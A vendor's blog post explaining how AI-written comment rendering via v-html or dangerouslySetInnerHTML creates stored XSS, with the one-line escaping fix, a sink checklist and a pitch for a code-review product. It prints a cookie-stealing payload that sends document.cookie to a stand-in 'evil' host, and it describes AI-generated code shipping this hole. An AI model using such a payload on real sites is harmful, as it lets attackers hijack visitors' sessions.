VelifyGet early access
← All postsJun 14, 2026

One comment that steals every login

AI renders user comments as raw HTML, so a comment containing a script tag runs on every visitor's browser — stealing sessions. This is XSS, and the fix is one line.

One comment that steals every login

You asked AI to show user comments. They display, you shipped. What you actually shipped lets one user post a comment that runs code on every other visitor’s browser — and quietly steals their sessions.

What you shipped

The comment is rendered as HTML instead of text:

Spot the bug

v-html (and React’s dangerouslySetInnerHTML) takes a string and injects it as live markup. So whatever a user typed becomes part of your page — including tags and scripts.

How anyone exploits it

They post a “comment” that’s actually code:

<img src=x onerror="fetch('https://evil/?c='+document.cookie)">

The image fails to load, the onerror fires, and now their script runs in the browser of everyone who views that comment — sending each visitor’s session cookie to the attacker. One comment, every viewer.

Why you won’t catch it

You test by typing normal comments, which render fine. The payload only does something when the text contains markup — which you’d never type and a normal test never includes.

Why AI does it

When the goal is “render this comment,” v-html is the most direct tool — it shows whatever you give it. The distinction between displaying text and executing markup is exactly the thing the happy path glosses over.

The fix is one line

Render as text. Frameworks escape it for you:

The fix

<div>{{ comment }}</div>

Now <img onerror=...> shows up as literal characters, not a running tag. If you genuinely need rich text, sanitize with a library like DOMPurify first — never trust raw input.

Check your app

  • Search for v-html, dangerouslySetInnerHTML, innerHTML, outerHTML, document.write.
  • Any of them fed user-controlled data is an XSS hole.
  • If rich HTML is required, it passes through a sanitizer (DOMPurify) before rendering.

The bigger problem

A senior dev flinches at v-html on user data. But if nobody senior reads the code, it ships — it works in every test, because every test types a plain comment. The author and reviewer are the same model with the same blind spot.

That’s the gap Velify is built to close: it reads your project and flags exactly this, in plain language, no terminal.

Join the early list at getvelify.app →

Ship AI-built code with confidence.

Velify catches what a senior developer would — before you ship.

Get early access →
Velify© 2026 Velify. All rights reserved.